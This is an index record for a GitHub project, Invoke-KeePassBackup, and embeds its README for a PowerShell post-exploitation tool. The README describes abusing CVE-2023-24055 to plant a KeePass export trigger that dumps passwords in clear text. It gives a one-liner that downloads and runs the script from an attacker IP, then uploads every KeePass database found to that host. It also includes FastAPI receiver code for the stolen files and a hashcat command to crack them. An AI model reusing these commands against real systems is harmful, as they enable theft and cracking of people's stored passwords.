{"id":18704789,"url":"https://github.com/n3rada/invoke-keepassbackup","last_synced_at":"2025-11-09T05:30:26.108Z","repository":{"id":199913895,"uuid":"704073837","full_name":"n3rada/Invoke-KeePassBackup","owner":"n3rada","description":"A PowerShell tool for backing up and exporting KeePass databases to a specified endpoint with GZip compression.","archived":false,"fork":false,"pushed_at":"2023-11-08T16:25:04.000Z","size":28,"stargazers_count":2,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2024-12-28T06:26:20.387Z","etag":null,"topics":["cve-2023-24055","exfiltration","keepass","pentesting-windows","post-exploitation","powershell"],"latest_commit_sha":null,"homepage":"","language":"PowerShell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/n3rada.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2023-10-12T13:35:31.000Z","updated_at":"2023-12-28T20:29:52.000Z","dependencies_parsed_at":"2023-10-13T12:31:33.057Z","dependency_job_id":"d04801be-f612-4e82-bb9d-5610587080f7","html_url":"https://github.com/n3rada/Invoke-KeePassBackup","commit_stats":null,"previous_names":["n3rada/invoke-keepassbackup"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/n3rada%2FInvoke-KeePassBackup","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/n3rada%2FInvoke-KeePassBackup/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/n3rada%2FInvoke-KeePassBackup/releases","
manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/n3rada%2FInvoke-KeePassBackup/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/n3rada","download_url":"https://codeload.github.com/n3rada/Invoke-KeePassBackup/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":239567635,"owners_count":19660519,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cve-2023-24055","exfiltration","keepass","pentesting-windows","post-exploitation","powershell"],"created_at":"2024-11-07T12:08:20.570Z","updated_at":"2025-11-09T05:30:26.074Z","avatar_url":"https://github.com/n3rada.png","language":"PowerShell","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Invoke-KeePassBackup\nThis PowerShell script has been crafted to streamline the process of transmitting KeePass databases to a designated endpoint. Conceived as an indispensable tool for your penetration testing toolkit, it aims to facilitate the exfiltration of target databases, paving the way for subsequent exploitation. 
🕊️\n\nThe goal is to incorporate comprehensive KeePass tests, thereby eliminating manual, time-consuming commands.\n\n## Features\n- Automatically locates the KeePass executable and ascertains its version.\n- Adds an export trigger to the KeePass configuration if the KeePass version is below 2.53 (a.k.a. [`CVE-2023-24055`](https://nvd.nist.gov/vuln/detail/CVE-2023-24055)).\n- Backs up the current KeePass configuration before making changes.\n- Searches the computer for all KeePass databases and uploads them to a given endpoint.\n- Uses GZip compression to reduce backup size.\n  \n## Usage\nRun the script using the following command:\n```powershell\nInvoke-KeePassBackup -url \"https://backup.endpoint/u\"\n```\n\nGiven the real use case, the preferred way to run it is from your own `HTTP(S)`/`WebDAV` server:\n```powershell\n$ip=\"192.168.45.218\";powershell -nop -c \"iex(irm http://$ip/Invoke-KeePassBackup.ps1); Invoke-KeePassBackup http://$ip/u\"\n```\nIt will output something like this:\n```powershell\n--------------- KeePass backup for noah@ITWR02\nKeePass location: C:\\Program Files\\KeePass Password Safe 2\\KeePass.exe\nKeePass version: 2.51.1.0\n--------------- Adding an export trigger on config file: C:\\Users\\noah\\AppData\\Roaming\\KeePass\\KeePass.config.xml\nBackup of current config file done at: C:\\Users\\noah\\AppData\\Roaming\\KeePass\\KeePass.config.backup.xml\nExport location: C:\\Users\\noah\\AppData\\Local\\Temp\\KeePassBackup.csv\nConfiguration complete. 
The trigger will go off as soon as it is opened.\n--------------- Scanning for KeePass databases on ITWR02\nFound KeePass database at: C:\\Users\\noah\\Documents\\Database.kdbx\nUploaded noah@ITWR02-20231012-Database.kdbx successfully!\n```\n\nThe reception point could look like this FastAPI Python3 code snippet:\n```python\n@app.post(\"/u\")\nasync def upload_file(x_file_name: str = Header(...), data: str = Body(...)):\n    \"\"\"\n    Handle file upload via POST request.\n\n    Args:\n        x_file_name (str): The name of the file, from header.\n        data (str): The body of the request containing the uploaded file's data.\n\n    Raises:\n        HTTPException: If the filename header is missing.\n        HTTPException: If an error occurs during file upload.\n    \"\"\"\n\n    if not x_file_name:\n        raise HTTPException(\n            status_code=status.HTTP_400_BAD_REQUEST,\n            detail=\"Provide a filename with Header 'X-File-Name'\",\n        )\n\n    try:\n        # Decode the base64 data\n        decoded_data = base64.b64decode(data.encode(\"utf-8\"))\n\n        # Check if the data is gzipped by looking at the first two bytes\n        if decoded_data[:2] == b\"\\x1f\\x8b\":\n            # If gzipped, decompress\n            buffer = io.BytesIO(decoded_data)\n            with gzip.GzipFile(fileobj=buffer, mode=\"rb\") as f:\n                processed_data = f.read()\n        else:\n            # If not gzipped, just use the decoded data as is\n            processed_data = decoded_data\n\n        # Save the file\n        save_file_content(file_name=x_file_name, data=processed_data)\n\n        return {\"status\": \"success\", \"message\": f\"Received {x_file_name}.\"}\n\n    except Exception as error:\n        logger.error(f\"Error while processing upload: {error}\")\n        raise HTTPException(status_code=500)\n```\n\nOnce the database is received, to crack the KeePass database hash, first use `keepass2john` to extract the hash. 
Then, remove the prepended filename, which acts as a username, and utilize `hashcat` with the desired wordlist and rules.\n```shell\nhashcat $(keepass2john loot/noah@ITWR02-20231012-Database.kdbx | cut -d':' -f2-) -a 0 -O -D 1 -w 3 /usr/share/wordlists/rockyou.txt -m 13400 -r /usr/share/hashcat/rules/rockyou-30000.rule --force\n```\n\n## Contributing\n\nPull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fn3rada%2Finvoke-keepassbackup","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fn3rada%2Finvoke-keepassbackup","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fn3rada%2Finvoke-keepassbackup/lists"}